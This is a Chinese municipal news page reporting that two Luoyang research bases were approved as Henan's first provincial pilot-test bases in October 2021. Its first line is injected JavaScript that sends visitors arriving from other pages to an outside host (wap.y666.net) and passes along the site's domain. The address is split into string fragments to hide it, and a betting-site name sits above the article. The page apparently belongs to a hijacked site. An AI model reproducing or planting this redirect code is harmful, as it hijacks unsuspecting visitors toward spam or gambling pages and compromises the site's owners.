var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

洛阳市2家单位获建河南省首批中试基地


发布日期:2021-10-21 09:00来源:洛阳市科学技术局 阅读次数:

  10月16日,河南省首批中试基地揭牌仪式在郑州举行,省委书记楼阳生为8家获批单位揭牌。洛阳市清华大学天津高端装备研究院洛阳先进制造产业研发基地获批“河南省高端装备中试基地”、洛阳特种材料研究院获批“河南省轻质金属材料中试基地”。清华大学天津高端装备研究院洛阳先进制造产业研发基地在大会上作了典型发言。

  中试基地,是为科技成果进行二次开发试验和企业规模生产提供成熟、适用、成套技术而开展中间试验的科研开发实体,是支撑引领产业链创新,加速科技成果产业化的重要平台。“河南省高端装备中试基地”依托清华大学天津高端装备研究院洛阳先进制造产业研发基地建设,聚焦高端装备产业,按照“引进-培育-熟化-再引进”路径,已面向30余家创新主体开展中试服务,形成产品近20个,孵化科技型企业10余家,其中孵化的清研锐为公司产品中标北京、南京等地地铁铣磨服务和香港地铁采购项目,中试形成的FGM01型高效成型打磨车、免示教智能视觉机器人等产品获评省市标志性高端装备、领先型高端装备。“河南省轻质金属材料中试基地”依托洛阳特种材料研究院建设,以铝、镁、钛合金等轻质高强新型金属材料研制为主攻方向,形成了从“特种材料设计、铸造成形、精密塑性成形、机械加工到表面处理”的全工艺中试验证平台,已开展重点中试科研项目30余项,试制轻量化产品50余种,先后为中航工业、航天科技等20余家国内龙头企业单位提供中试服务,是河南省唯一以轻质高强金属材料为重点的中试基地。

  洛阳市从2020年开始探索开展市级中试基地备案工作,首批已围绕装备制造、新材料等领域备案中试基地5家,摸底列入培育后备基地39家。下一步,洛阳市科技局将大力实施孵化育成体系建设行动,依托高校院所、龙头企业、研发机构,聚焦主导产业发展、产业集群培育和未来产业布局,高水平建设一批研发中试基地,加快工程化、产业化进程,推动科技成果就地就近转化为现实生产力。